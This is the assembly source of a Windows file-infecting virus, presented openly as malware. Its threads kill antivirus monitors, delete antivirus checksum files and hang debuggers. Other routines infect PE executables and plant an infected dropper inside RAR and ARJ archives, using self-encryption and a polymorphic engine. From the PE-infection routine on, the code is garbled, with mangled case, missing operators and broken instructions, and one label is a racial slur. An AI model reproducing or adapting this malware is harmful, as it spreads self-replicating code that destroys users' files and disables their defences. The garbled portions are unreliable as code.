        org     $-4
modbase dd      00400000h
        push    ebx                     ; pass control to the host
        ret                             ; code...

; Justice is lost, justice is raped, justice is gone...

; ===========================================================================
; || Restore the first bytes of the host ||
; ===========================================================================

restoreoldbytes:
        mov     edi,dword ptr [ebp+oldeip]
        add     edi,dword ptr [ebp+modbase] ; edi = ptr to host's EP
        lea     esi,dword ptr [ebp+oldbytes] ; esi = ptr to its orig. bytes
        mov     ecx,PLIMIT              ; ecx = bytes to restore
        rep     movsb                   ; restore it!
        ret

; ===========================================================================
; || The main thread of the virus ||
; ===========================================================================
;
; Higher you are, harder you fall
;

mainthread      proc    pascal delta_thread:dword
        mov     ebp,delta_thread        ; ebp = delta offset
        pushad
        call    mt_setupseh             ; setup a new SEH handler
        mov     esp,[esp+08h]
        jmp     mt_restoreseh
mt_setupseh:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp

        call    ienc_decrypt
        dd      00000000h
        dd      eblock2-block2
block2  label   byte
        call    getusefulinfo           ; retrieve useful info

        mov     ecx,NTHREADS            ; ecx = number of threads to
                                        ; launch
        lea     esi,[ebp+threadstable]  ; esi = ptr to thread table
loopoflaunchallthreads:
        push    ecx                     ; preserve ecx
        xor     edx,edx                 ; edx = 0
        lea     eax,[ebp+lpthreadid]
        push    eax                     ; lpThreadId
        push    edx                     ; dwCreationFlags
        push    ebp                     ; lpParameter
        lodsd
        add     eax,ebp
        push    eax                     ; lpStartAddress
        push    edx                     ; dwStackSize
        push    edx                     ; lpThreadAttributes
        apicall _CreateThread
        pop     ecx
        loop    loopoflaunchallthreads

; Control loops of all threads

        inc     byte ptr [ebp+tkm_semaphore] ; init thread 1
        inc     byte ptr [ebp+tad_semaphore] ; init thread 2
        inc     byte ptr [ebp+tdc_semaphore] ; init thread 3
        inc     byte ptr [ebp+tpp_semaphore] ; init thread 4
        inc     byte ptr [ebp+tpi_semaphore] ; init thread 5

tad_cl: cmp     byte ptr [ebp+tad_semaphore],THREAD_SLEEPING
        jnz     tad_cl                  ; wait for thread 2 end
        cmp     byte ptr [ebp+softice],00h
        jne     tkm_cl
tpi_cl: cmp     byte ptr [ebp+tpi_semaphore],THREAD_SLEEPING
        jnz     tpi_cl
        inc     byte ptr [ebp+tif_semaphore] ; init thread 6 after thread 5
tif_cl: cmp     byte ptr [ebp+tif_semaphore],THREAD_SLEEPING ; ends
        jnz     tif_cl
tkm_cl: cmp     byte ptr [ebp+tkm_semaphore],THREAD_SLEEPING
        jnz     tkm_cl                  ; wait for thread 1 end
tdc_cl: cmp     byte ptr [ebp+tdc_semaphore],THREAD_SLEEPING
        jnz     tdc_cl                  ; wait for thread 3 end
tpp_cl: cmp     byte ptr [ebp+tpp_semaphore],THREAD_SLEEPING
        jnz     tpp_cl                  ; wait for thread 4 end
eblock2 label   byte
mt_restoreseh:
        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx
        popad
        jmp     exitthread
mainthread      endp

; ===========================================================================
; || This procedure makes the thread that calls it be closed ||
; ===========================================================================

exitthread:
        push    00h
        apicall _ExitThread
        ret

; ===========================================================================
; || Thread used for killing TSR monitors (AVP & NOD) ||
; ===========================================================================

thrkillmonitors proc    pascal delta_thread:dword
        mov     ebp,delta_thread
        xor     ecx,ecx
tkm_sleep:
        mov     cl,THREAD_SLEEPING
tkm_semaphore   equ     $-1
        jecxz   tkm_sleep
        pushad
        call    tkm_setupseh            ; setup a SEH handler
        mov     esp,[esp+08h]
        jmp     tkm_restoreseh
tkm_setupseh:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp

        call    ienc_decrypt            ; encrypt this block
        dd      00000000h
        dd      eblock3-block3
block3  label   byte
        lea     edi,[ebp+monitors2kill] ; edi = ptr to array of mons.
km_l00p:
        call    terminateproc           ; terminate its process
        eosz_edi                        ; end of string of edi
        cmp     byte ptr [edi],BILLY_BEL ; end of array?
        jnz     km_l00p                 ; kewl.
eblock3 label   byte
tkm_restoreseh:
        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx
        popad
        and     byte ptr [ebp+tkm_semaphore],THREAD_SLEEPING
        jmp     exitthread
thrkillmonitors endp

; ===========================================================================
; || Thread for killing the application level debuggers ||
; ===========================================================================

thrantidebugger proc    pascal delta_thread:dword
        mov     ebp,delta_thread
        xor     ecx,ecx
tad_sleep:
        mov     cl,THREAD_SLEEPING
tad_semaphore   equ     $-1
        jecxz   tad_sleep
        pushad
        call    tad_setupseh
        mov     esp,[esp+08h]
        jmp     tad_restoreseh
tad_setupseh:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp

        call    ienc_decrypt
        dd      00000000h
        dd      eblock4-block4
block4  label   byte
        and     byte ptr [ebp+softice],00h

; I'm a SoftICE addict... any problem? :)

if DEBUG
else
detectsice:
        lea     edi,[ebp+drivers2avoid]
searchdriverz:
        xor     eax,eax                 ; this little trick allows
        push    eax                     ; us to check for drivers,
        push    00000080h               ; so we can check for our
        push    00000003h               ; beloved SoftICE in its
        push    eax                     ; Win9x and WinNT versions!
        inc     eax
        push    eax
        push    80000000h or 40000000h
        push    edi
        apicall _CreateFileA
        inc     eax
        jz      nodriverfound
        dec     eax
        push    eax
        apicall _CloseHandle
        inc     byte ptr [ebp+softice]
nodriverfound:
        eosz_edi
        cmp     byte ptr [edi],BILLY_BEL
        jnz     searchdriverz
endif

some_antidebug:
        mov     ecx,fs:[20h]            ; ecx = context of debugger
        jecxz   more_antidebug          ; if ecx <> 0, we're debugged
        jmp     hangit
more_antidebug:
        pushs   "IsDebuggerPresent"
        push    dword ptr [ebp+kernel]
        apicall _GetProcAddress
        xchg    eax,ecx                 ; same than before, but API
        jecxz   tad_exit                ; based
        call    ecx
        xchg    eax,ecx
        jecxz   tad_exit
hangit: xor     esp,esp                 ; hahahah! die-die-die!!!
        cli
        call    $-1
eblock4 label   byte
tad_exit:
tad_restoreseh:
        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx
        popad
        and     byte ptr [ebp+tad_semaphore],THREAD_SLEEPING
        jmp     exitthread
thrantidebugger endp

; ===========================================================================
; || Thread used for deleting AV CRC files ||
; ===========================================================================

thrdeletecrc    proc    pascal delta_thread:dword
        mov     ebp,delta_thread
        xor     ecx,ecx
tdc_sleep:
        mov     cl,THREAD_SLEEPING
tdc_semaphore   equ     $-1
        jecxz   tdc_sleep
        pushad
        call    tdc_setupseh
        mov     esp,[esp+08h]
        jmp     tdc_restoreseh
tdc_setupseh:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp

        call    ienc_decrypt
        dd      00000000h
        dd      eblock5-block5
block5  label   byte
        lea     edi,[ebp+files2kill]    ; load pointer to first file
killem: push    edi                     ; push file to erase
        apicall _DeleteFileA            ; delete it!
        eosz_edi
        cmp     byte ptr [edi],BILLY_BEL
        jnz     killem
eblock5 label   byte
tdc_restoreseh:
        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx
        popad
        and     byte ptr [ebp+tdc_semaphore],THREAD_SLEEPING
        jmp     exitthread
thrdeletecrc    endp

; ===========================================================================
; || Thread used for retrieving all the useful info for infection ||
; ===========================================================================

thrprepareinf   proc    pascal delta_thread:dword
        mov     ebp,delta_thread
        xor     ecx,ecx
tpi_sleep:
        mov     cl,THREAD_SLEEPING
tpi_semaphore   equ     $-1
        jecxz   tpi_sleep
        pushad
        call    tpi_setupseh
        mov     esp,[esp+08h]
        jmp     tpi_restoreseh
tpi_setupseh:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp

        call    ienc_decrypt
        dd      00000000h
        dd      eblock6-block6
block6  label   byte
        lea     edi,[ebp+windowsdir]    ; get Windows directory
        push    7Fh
        push    edi
        apicall _GetWindowsDirectoryA
        add     edi,7Fh                 ; get System directory
        push    7Fh
        push    edi
        apicall _GetSystemDirectoryA
        add     edi,7Fh                 ; get current directory
        push    edi
        push    7Fh
        apicall _GetCurrentDirectoryA
eblock6 label   byte
tpi_restoreseh:
        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx
        popad
        and     byte ptr [ebp+tpi_semaphore],THREAD_SLEEPING
        jmp     exitthread
thrprepareinf   endp

; ===========================================================================
; || Thread used for infecting files ||
; ===========================================================================

thrinfectfiles  proc    pascal delta_thread:dword
        mov     ebp,delta_thread
        xor     ecx,ecx
tif_sleep:
        mov     cl,THREAD_SLEEPING
tif_semaphore   equ     $-1
        jecxz   tif_sleep
        pushad
        call    tif_setupseh
        mov     esp,[esp+08h]
        jmp     tif_restoreseh
tif_setupseh:
        xor     edx,edx
        push    dword ptr fs:[edx]
        mov     fs:[edx],esp

        call    ienc_decrypt
        dd      00000000h
        dd      eblock7-block7
block7  label   byte
        lea     edi,[ebp+directories]   ; pointer to array of dirs
        mov     byte ptr [ebp+mirrormirror],DIRS2INF
requiem:
        push    edi                     ; set it as current
        apicall _SetCurrentDirectoryA
        push    edi                     ; preserve that pointer
        lea     esi,[ebp+extensions_table] ; pointer to exts table
        mov     ecx,NEXTENSIONS
dirinf:
        lea     edi,[ebp+extension]     ; ptr to active extension
        movsd                           ; put next one
        pushad
        call    infect                  ; infect some filez
        popad
        loop    dirinf
        pop     edi
        add     edi,7Fh                 ; ptr to next dir
        dec     byte ptr [ebp+mirrormirror] ; eeeoo supeeeeerrr... :)
        jnz     requiem
eblock7 label   byte
tif_restoreseh:
        xor     edx,edx
        pop     dword ptr fs:[edx]
        pop     edx
        popad
        and     byte ptr [ebp+tif_semaphore],THREAD_SLEEPING
        jmp     exitthread
thrinfectfiles  endp

; ===========================================================================
; || Search all the files (until limit reached) matching the search mask ||
; ===========================================================================

infect:
        call    ienc_decrypt
        dd      00000000h
        dd      eblock8-block8
block8  label   byte
        and     dword ptr [ebp+infections],00000000h ; reset counter
        lea     eax,[ebp+offset WIN32_FIND_DATA] ; find's shit
        push    eax
        lea     eax,[ebp+offset search_mask]
        push    eax
        apicall _FindFirstFileA         ; find da first file
        cmp_    eax,failinfect
        mov     dword ptr [ebp+searchhandle],eax
__1:    push    dword ptr [ebp+modbase]
        push    dword ptr [ebp+oldeip]
        push    dword ptr [ebp+neweip]
        cmp     dword ptr [ebp+extension],"RAR"
        jz      archinfection
        cmp     dword ptr [ebp+extension],"JRA"
        jz      archinfection
        call    infection
        jmp     overit
archinfection:
        call    infectarchives
overit: pop     dword ptr [ebp+neweip]
        pop     dword ptr [ebp+oldeip]
        pop     dword ptr [ebp+modbase]
        inc     byte ptr [ebp+infections]
        cmp     byte ptr [ebp+infections],N_INFECTIONS
        jz      failinfect
__2:    lea     edi,[ebp+WFD_szFileName]
        mov     ecx,MAX_PATH
        xor     al,al
        rep     stosb
        lea     eax,[ebp+offset WIN32_FIND_DATA]
        push    eax
        push    dword ptr [ebp+searchhandle]
        apicall _FindNextFileA
        or      eax,eax
        jnz     __1
closesearchhandle:
        push    dword ptr [ebp+searchhandle]
        apicall _FindClose
failinfect:
        ret
eblock8 label   byte

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

; || Infect PE file (by using wfd info) ||

[] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [] [ ] [] [] [] [] [] [] [] [] [] [] [] [] []

Infection:

Call Ienc_Decrypt

DD 00000000h

DD EBLOCK9-Block9

Block9 label byte

Lea ESI, [EBP WFD_SZFILENAME]; GET FileName to Infect

Push 80h

PUSH ESI

Apicall_SetFileAttributesa; Wipe ITS Attributes

Call OpenFile; Open IT

CMP_ EAX, Cantopen

Mov DWORD PTR [EBP FILEHANDLE], EAX

MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]; 1st WE CREATE MAP with

Call CreateMap; ITS Exact Size

OR EAX, EAX

JZ Closefile

MOV DWORD PTR [EBP MAPHANDLE], EAX

MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]

Call MapFile; MAP IT

OR EAX, EAX

JZ unmapfile

MOV DWORD PTR [EBP MAPADDRESS], EAX

MOV ESI, [EAX 3CH]

Add ESI, ESI

CMP DWORD PTR [ESI], "EP"; Is IT PE?

JNZ NOINFECT

CMP DWORD PTR [ESI MARK], INF_MARK; WAS IT INFECTED?

JZ NOINFECT

Push DWORD PTR [ESI 3CH]

Push DWORD PTR [EBP MAPADDRESS]; Close All

Apicall_unmapviewoffile

Push DWORD PTR [EBP MAPHANDLE]

Apicall_closehandle

POP ECX

MOV EAX, DWORD PTR [EBP WFD_NFILESZELOW]; and map all again.

Add Eax, Virus_size

Call align

XCHG ECX, EAX

MOV DWORD PTR [EBP NEWSIZE], ECX

Call CreateMap

OR EAX, EAX

JZ Closefile

MOV DWORD PTR [EBP MAPHANDLE], EAX

MOV ECX, DWORD PTR [EBP Newsize]

Call MapFile

OR EAX, EAX

JZ unmapfile

MOV DWORD PTR [EBP MAPADDRESS], EAX

MOV ESI, [EAX 3CH]

Add ESI, ESI

Mov EDI, ESI

Movzx Eax, Word PTR [EDI 06H]

Dec EAX

Imul Eax, Eax, 28h

Add ESI, ESI

Add ESI, 78H

MOV EDX, [EDI 74H]

SHL EDX, 03H

Add ESI, EDX

Pushad

CMP DWORD PTR [ESI], "LER."

JNZ Not_Reloc

CMP Word PTR [ESI 4], "CO"

JNZ Not_Reloc

XCHG EDI, ESI; PUT A New Name To .Reloc

Call generatename; section :)

NOT_RELOC:

Popad

And DWORD PTR [EDI 0A0H], 00H; Nulify THE Relocs, So They

And DWORD PTR [EDI 0A4H], 00h; Won't fuck us :)

Mov Eax, [EDI 28h]

MOV DWORD PTR [EBP OLDEIP], EAX

Mov EDX, [ESI 10h]

MOV EBX, EDX

Add Edx, [ESI 14h]

Push Edx

MOV EAX, EBX

Add Eax, [ESI 0CH]

Mov DWORD PTR [EBP NEWEIP], EAX

Mov Eax, [ESI 10h]

Add Eax, Virus_size

MOV ECX, [EDI 3CH]

Call align

MOV [ESI 10H], EAX

MOV [ESI 08H], EAX

POP EDX

Mov Eax, [ESI 10h]

Add Eax, [ESI 0CH]

MOV [EDI 50H], ​​EAX

OR DWORD PTR [ESI 24H], Section_Flags

MOV DWORD PTR [EDI MARK], INF_MARK

Pushad

Mov Eax, [EDI 28H]

MOV ESI, EDI

Add ESI, 0F8H-28H; Pointer to 1st Section-28h

Nigger: Add ESI, 28H; Ptr to Section Name;)

Mov Edx, Eax; Put in Edx The Original EIP

Sub EDX, [ESI 0CH]; Remove The VirtualAddress

CMP EDX, [ESI 08H]; Is Eip Pointing to this SEC?

Jae Nigger; if not, loop again

OR [ESI 24H], Section_Flags; Put Sum Attributes

Add Edx, [ESI 14H]

Add Edx, DWORD PTR [EBP MAPADDRESS]

MOV ESI, EDX

Push Edx

Push 00000100h; Alltes for Store

Push 00h; the first bytes of the inf.

Apicall _globalalloc; files (temporarily)

MOV DWORD PTR [EBP GLOBALLOCHANDLE3], EAX

MOV ECX, 100H

Push ECX

Push EDI

Xchg EDI, EAX

REP MOVSB

POP EDI

MOV EAX, DWORD PTR [EBP NEWEIP]

Sub Eax, [EDI 28H]

Lea Edi, [EBP Newbytes]

Push EDI

; Freedom or fire! Mwahahahahah!

Call Phire; Ya Wanna Sum Fire?> :)

POP ESI

POP ECX

POP EDI

REP MOVSB

Popad

Push EDI

Push Edx

Apicall_GettickCount

POP EDX

XCHG EAX, EBX

MOV DWORD PTR [EBP Key], EBX

Lea ESI, [EBP LEGACY]

XCHG EDI, EDX

Add Edi, DWORD PTR [EBP MAPADDRESS]

Push EDI

MOV ECX, Virus_Size

REP MOVSB

Mov Edi, [ESP]

Pushad

Lea ESI, [EBP IENC_STRUC]

Call Ienc_Encrypt

Popad

Pushad

MOV ESI, DWORD PTR [EBP GLOBALLOCHANDLE3]

Add Edi, (Offset OldBytes-Offset Virus_Start)

MOV ECX, 100H

REP MOVSB

Popad

Add Edi, Offset Crypt-Offset Virus_Start

MOV ESI, EDI

MOV ECX, ((Offset Virus_end-Offset Crypt) / 4)

CLOOP: LODSD

XOR EAX, EBX

Stosd

Loop Cloop

Mov Eax, EDI

POP EDI

MOV ECX, Virus_Size-Limit

MOV ESI, EDI

Add ESI, LIMIT

Call mmxe

POP EDI

MOV ECX, [EDI 3CH]

Call align

SUB EAX, DWORD PTR [EBP MAPAddress]

Push EAX

Push DWORD PTR [EBP MAPADDRESS]

Push EAX

Call Checksum

MOV [EDI 58H], EAX

POP ECX

Call Truncfile

Push DWORD PTR [EBP GLOBALLOCH1]; Free Some Memory

Apicall_globalfree

JMP unmapfile

NOINFECT:

Dec Byte PTR [EBP Infections]

MOV ECX, DWORD PTR [EBP WFD_NFILESZELOW]

Call Truncfile

Unmapfile:

Push DWORD PTR [EBP MAPADDRESS]

Apicall_unmapviewoffile

Closemap:

Push DWORD PTR [EBP MAPHANDLE]

Apicall_closehandle

Closefile:

Push DWORD PTR [EBP FILEHANDLE]

Apicall_closehandle

Cantopen:

Push DWORD PTR [EBP WFD_DWFileAttributes]

Lea Eax, [EBP WFD_SZFILENAME]

Push EAX

Apicall_SetFileAttributesa

RET

Eblock9 label byte

; || Infect Given File In EDI ||

Infectedi:

Call Ienc_Decrypt

DD 00000000h

DD EBLOCKA-Blocka

Blocka label Byte

Push EDI

Apicall_GetfileAttributesa

CMP_ Eax, _exitinfection

MOV DWORD PTR [EBP WFD_DWFILEATTRIBUTES], EAX

MOV ESI, EDI

Call OpenFile

CMP_ Eax, _exitinfection

Push EAX

Push 00000000H

Push EAX

Apicall_GetFileSize

MOV DWORD PTR [EBP WFD_NFILESZELOW], EAX

Apicall_closehandle

Lea ESI, [EBP WFD_SZFILENAME]

XCHG ESI, EDI

Duhast: Lodsb

OR Al, Al

JZ ENGEL

Stosb

JMP duhast

Engel: Stosb

Push DWORD PTR [EBP NEWEIP]

Push DWORD PTR [EBP OLDEIP]

Push DWORD PTR [EBP MODBASE]

Call infection

POP DWORD PTR [EBP MODBASE]

POP DWORD PTR [EBP OLDEIP]

POP DWORD PTR [EBP NEWEIP]

Test Al, 00h; OVERLAPPPPPP

Org $ -1

_Exitinfection:

STC

RET

Eblocka label Byte

Infectarchiveedi:

Call Ienc_Decrypt

DD 00000000h

DD EBLOCKB-Blockb

Blockb Label Byte

Lea ESI, [EBP WFD_SZFILENAME]

XCHG EDI, ESI

PUSH ESI

Push 7fh

POP ECX

REP MOVSB

POP EDI

EOSZ_EDI

MOV EAX, [EDI-4]

MOV DWORD PTR [EBP EXTENSION], EAX

JMP Infectorchives

EBLOCKB LABEL BYTE

; || Infect Archives (Using WFD INFO) ||

;

; Infinite thanx here to two guys: Starzer0 and Int13h... without you,

; I wouldn't have been able to code this part of this virus :)

Infectarchives:

Call Ienc_Decrypt

DD 00000000h

DD EBLOCKC-Blockc

Blockc label byte

Lea ESI, [EBP WFD_SZFILENAME]; Save the name to infect

Lea EDI, [EBP TMP_SZFILENAME]; LATER ...

Push 7fh

POP ECX

REP MOVSB

Push 00001000H; Alloc Memory for unpack the

PUSH 00000000H; DROPPER

Apicall_GlobalAlloc

OR EAX, EAX

JZ EXIXFECTARCHIVE

MOV DWORD PTR [EBP GLOBALLOCHANDLE], EAX

Call over_dropper

DR0P:

; packed dropper image (DB table), unpacked by Lsce_unpack below

SDR0P EQU ($ -offset DR0P)

Over_dropper:

POP ESI

MOV ECX, SDR0P; Unpack in Allocated Memory

XCHG EDI, EAX; The Dropper

Call Lsce_unpack

Push 00000000H; Create the Dropper on

Push 00000080h; a Temporal File Called

Push 00000002h; Legacy.TMP (That Will B)

Push 00000000H; ERSED LATER)

Push 00000001H

Push 40000000H

Lea Edi, [EBP HATE]

Push EDI

Apicall_createfilea

Push Eax; Write IT, SUCKA!

Push 00000000H

LEA EBX, [EBP IOBYTES]

Push EBX

Push 00001000H

Push DWORD PTR [EBP GLOBALLOCHANDLE]

Push EAX

Apicall_writefile

Apicall_closehandle

Call O_TMP

Hate DB "Legacy.TMP", 0; Infect the Dropped file

O_TMP: POP EDI

Call Infectedi

Lea Eax, [EBP WIN32_FIND_DATA]; FIND's Shit

Push EAX

Lea Eax, [EBP HATE]

Push EAX

Apicall_findfirstfilea

INC EAX

JZ Cantopenarchive

Dec EAX

Push DWORD PTR [EBP WFD_NFILESZELOW]

POP DWORD PTR [EBP Infdroppersize]

Push EAX

Apicall_findclose

Lea ESI, [EBP HATE]

Call OpenFile

Mov DWORD PTR [EBP FILEHANDLE], EAX

Push DWORD PTR [EBP INFDROPPERSIZE]

Push 00000000H

Apicall_GlobalAlloc

OR EAX, EAX

JZ Closefilearchive

MOV DWORD PTR [EBP GLOBALLOCHANDLE2], EAX

Push 00h

Lea EBX, [EBP NumbytesRead]

Push EBX

Push DWORD PTR [EBP INFDROPPERSIZE]

Push EAX

Push DWORD PTR [EBP FILEHANDLE]

Apicall _readfile

Push DWORD PTR [EBP FILEHANDLE]

Apicall_closehandle

Lea ESI, [EBP TMP_SZFILENAME]; GET FileName to Infect

Push 80h

PUSH ESI

Apicall_SetFileAttributesa; Wipe ITS Attributes

Call OpenFile; Open IT

CMP_ Eax, Cantopenarchive

Mov DWORD PTR [EBP FILEHANDLE], EAX

Push 00h

Push EAX

Apicall_GetFileSize

MOV DWORD PTR [EBP ArchiveSize], EAX

MOV ECX, DWORD PTR [EBP EXTEN]

; CMP ECX, "RAR"

JZ Infectrar

CMP ECX, "JRA"

JZ Infectorj

; -------------

; RAR Infection

; -------------

Infectrar:

Push 00h; See if IT Was Previously

Push 00h; Infected ...

SUB EAX, DWORD PTR [EBP Infdroppersize]

Sub Eax, SRarheadersize

Push EAX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_setfilepointer

INC EAX

JZ Trytoinfectrar

Dec EAX

Push 00h

Lea EBX, [EBP NumbytesRead]

Push EBX

PUSH 50D

Lea EBX, [EBP ArchiveBuffer]

Push EBX

Push DWORD PTR [EBP FILEHANDLE]

Apicall _readfile

OR EAX, EAX

JZ Trytoinfectrar

CMP Word PTR [EBP ArchiveBuffer 14h], Archive_Mark

JZ Closefilearchive

; Let's fill properly RAR fields :)

Trytoinfectrar:

Lea EDI, [EBP RARNAME]; Generate a Random 6 Char Name

Call generatename; for the DR0PPER;)

MOV EDI, DWORD PTR [EBP Infdroppersize]

MOV DWORD PTR [EBP RARCOMPRESSED], EDI

MOV DWORD PTR [EBP RARORIGINAL], EDI

MOV ESI, DWORD PTR [EBP GLOBALLOCHANDLE2]

Call CRC32

MOV DWORD PTR [EBP RARCRC32], EAX

Lea ESI, [EBP RARHEADER 2]

Mov EDI, SRARHEADERSIZE-2

Call CRC32

MOV Word PTR [EBP RARHEADERCRC], AX

Push 02h

Push 00h

Push 00h

Push DWORD PTR [EBP FILEHANDLE]

Apicall_setfilepointer

Push 00h

LEA EBX, [EBP IOBYTES]

Push EBX

Push Srarheadersize

Lea EBX, [EBP RARHEADER]

Push EBX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_writefile

Push 00h

LEA EBX, [EBP IOBYTES]

Push EBX

Push DWORD PTR [EBP INFDROPPERSIZE]

Push DWORD PTR [EBP GLOBALLOCHANDLE2]

Push DWORD PTR [EBP FILEHANDLE]

Apicall_writefile

JMP CloseFilearchive

; -------------

; ARJ Infection

; -------------

Infectorj:

Push 00h; Let's see if it is infected

Push 00h

SUB EAX, DWORD PTR [EBP Infdroppersize]

Sub Eax, Sarjtotalsize 4

Push EAX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_setfilepointer

INC EAX

JZ Trytoinfectorj

Dec EAX

Push 00h

Lea EBX, [EBP NumbytesRead]

Push EBX

PUSH 50D

Lea EBX, [EBP ArchiveBuffer]

Push EBX

Push DWORD PTR [EBP FILEHANDLE]

Apicall _readfile

OR EAX, EAX

JZ Trytoinfectorj

CMP Word PTR [EBP ArchiveBuffer], 0EA60H

Jnz CloseFilearchive

CMP Word PTR [EBP ArchiveBuffer 0Ch], Archive_Mark

JZ Closefilearchive

; Let's Fill Properly Arj Fields :)

Trytoinfectorj:

Lea EDI, [EBP ArjFileName]

Call generatename

Push 02h

Push 00h

Push 00h

Push DWORD PTR [EBP FileHandle]

Apicall_setfilepointer

XCHG ECX, EDX

Mov Edx, EAX

Sub EDX, 4

SBB ECX, 1

Add ECX, 1

Push 00h

Push 00h

Push Edx

Push DWORD PTR [EBP FILEHANDLE]

Apicall_setfilepointer

MOV EDI, DWORD PTR [EBP Infdroppersize]

MOV DWORD PTR [EBP ARJCompress], EDI

MOV DWORD PTR [EBP Arjoriginal], EDI

MOV ESI, DWORD PTR [EBP GLOBALLOCHANDLE2]

Call CRC32

MOV DWORD PTR [EBP ArjCrc32], EAX

Push 00h

LEA EBX, [EBP IOBYTES]

Push EBX

Push Sarjheader

Lea EBX, [EBP Arjheader]

Push EBX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_writefile

Lea ESI, [EBP ARJHSMSIZE]

Mov Edi, Sarjcrc32Size

Call CRC32

MOV DWORD PTR [EBP ArjheaderCrc], EAX

Push 00h

LEA EBX, [EBP IOBYTES]

Push EBX

Push Sarjsecondside

Lea EBX, [EBP ARJSECONDSIDE]

Push EBX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_writefile

Push 00h

LEA EBX, [EBP IOBYTES]

Push EBX

Push DWORD PTR [EBP INFDROPPERSIZE]

Push DWORD PTR [EBP GLOBALLOCHANDLE2]

Push DWORD PTR [EBP FILEHANDLE]

Apicall_writefile

And Word PTR [EBP Arjheadsiz], 0000H; this shit is needed

Push 00h

LEA EBX, [EBP IOBYTES]

Push EBX

Push 04h

Lea EBX, [EBP Arjheader]

Push EBX

Push DWORD PTR [EBP FILEHANDLE]

Apicall_writefile

Closefilearchive:

Push DWORD PTR [EBP FILEHANDLE]

Apicall_closehandle

Cantopenarchive:

Push DWORD PTR [EBP GLOBALLOCHANDLE]

Apicall_globalfree

Push DWORD PTR [EBP GLOBALLOCHANDLE2]

Apicall_globalfree

Lea Edi, [EBP HATE]

Push EDI

Apicall_Deletefilea

ExitInfectarchive:

RET

Eblockc label byte

; || Some miscellaneous routines ||

GetUsefulinfo:

Pushs "user32"

Apicall_LoadLibrarya

Push EAX

Lea ESI, [EBP @ FindWindowa]

Lea Edi, [EBP @@ offsetzuser32]

Call getapis

Apicall_freelibrary

Pushs "Advapi32"

Apicall_LoadLibrarya

Push EAX

Lea ESI, [EBP @ regcreateKeyexa]

Lea Edi, [EBP @@ offsetzadvapi32]

Call getapis

Apicall_freelibrary

RET

; Input:

;   ESI = program return address

; Output:

;   EAX = kernel32 imagebase

;

Getk32 proc

Pushad

Call getk32_seh

MOV ESP, [ESP 08H]

Wefailed:

Popad

Pushad

Mov ESI, KERNEL_W9X

Call Checkmz

JNC Weigotk32

Mov ESI, KERNEL_WNT

Call Checkmz

JNC Weigotk32

Mov ESI, KERNEL_W2K

Call Checkmz

JNC Weigotk32

XOR ESI, ESI

JMP Weigotk32

Getk32_seh:

XOR EDX, EDX

Push DWORD PTR FS: [EDX]

MOV FS: [EDX], ESP

And ESI, 0FFFFF0000H

_ @ 1: CMP Word PTR [ESI], "ZM"

JZ Checkpe

_ @ 2: SUB ESI, 00010000H

LOOP _ @ 1

JMP Wefailed

Checkpe:

Mov EDI, [ESI 3CH]

Add Edi, ESI

CMP DWORD PTR [EDI], "EP"

JNZ _ @ 2

Wegotk32:

XOR EDX, EDX

POP DWORD PTR FS: [EDX]

POP EDX

MOV [ESP.PUSHAD_EAX], ESI

Popad

RET

Getk32 ENDP

; Input:

;   EAX = base address of the library where to search the APIs

;   ESI = pointer to an array of CRC32s of the APIs we want to search

;   EDI = pointer to where to store the APIs

; Output:

;   Nothing.

;

GetApis Proc

Push Eax; Eax = Handle of Module

POP DWORD PTR [EBP TMPMODULEBASE]

APIS33K:

Lodsd; Get in Eax The CRC32 OF API

Push ESI EDI

Call getapi_et_crc32

POP EDI ESI

STOSD; Save In [edi] The API Address

CMP BYTE PTR [ESI], BILLY_BEL; LAST API?

JNZ Apis33k; Yeah, Get Outta Here

RET

GetApis Endp

; Input:

;   EAX = CRC32 of the API whose address we want to know

; Output:

;   EAX = API address

;

GetAPi_ET_CRC32 Proc

XOR EDX, EDX

XCHG Eax, EDX; PUT CRC32 of Da API IN EDX

MOV Word PTR [EBP Counter], AX; Reset Counter

Mov ESI, 3CH

Add ESI, [EBP TMPMODULEBASE]; Get PE Header of Module

Lodsw

Add Eax, [EBP TMPMODULEBASE]; NORMALIZE

MOV ESI, [EAX 78H]; Get a Pointer to ITS

Add ESI, 1CH; Export Table

Add ESI, [EBP TMPMODULEBASE]

Lea EDI, [EBP AddResStableva]; Pointer to the Address Table

Lodsd; Get AddresStable value

Add Eax, [EBP TMPMODULEBASE]; NORMALIZE

Stosd; and store in its variable

Lodsd; Get NameTable value

Add Eax, [EBP TMPMODULEBASE]; NORMALIZE

Push Eax; Put IT in Stack

StOSD; Store In Its Variable

Lodsd; Get OrdinalTable Value

Add Eax, [EBP TMPMODULEBASE]; NORMALIZE

StOSD; Store

POP ESI; ESI = Nametable VA

@? _ 3: Push ESI; Save Again

Lodsd; Get Pointer to an API Name

Add Eax, [EBP TMPMODULEBASE]; NORMALIZE

XCHG EDI, EAX; Store PTR in Edi

MOV EBX, EDI; And in EBX

Push Edi; Save EDI

EOSZ_EDI

POP ESI; ESI = Pointer to API Name

SUB EDI, EBX; EDI = API Name Size

Push EDX; Save API's CRC32

Call CRC32; GET ACTUAL API's CRC32

POP EDX; Restore API's CRC32

CMP EDX, EAX; Are Them Equal?

JZ @? _ 4; if Yes, WE GOT IT

POP ESI; Restore Ptr To API Name

Add ESI, 4; Get the next

Inc Word PTR [EBP Counter]; and increase the counter

JMP @? _ 3; Get Another API!

@? _ 4:

